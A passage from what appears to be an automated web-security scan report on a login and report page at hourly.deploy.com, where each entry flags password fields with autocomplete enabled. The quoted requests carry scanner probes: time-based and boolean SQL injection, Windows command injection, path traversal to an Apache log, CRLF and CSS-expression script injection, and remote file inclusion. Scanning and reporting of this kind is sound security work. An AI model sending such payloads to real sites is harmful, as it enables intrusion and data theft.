           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.173. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.174. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.175. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.176. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.177. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.178. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.179. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.180. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.181. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.182. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=body%7Bx:expression(netsparker(0x000033))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000033))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.183. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.184. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.185. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.186. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.187. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.188. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.189. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00002A))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00002a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.190. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
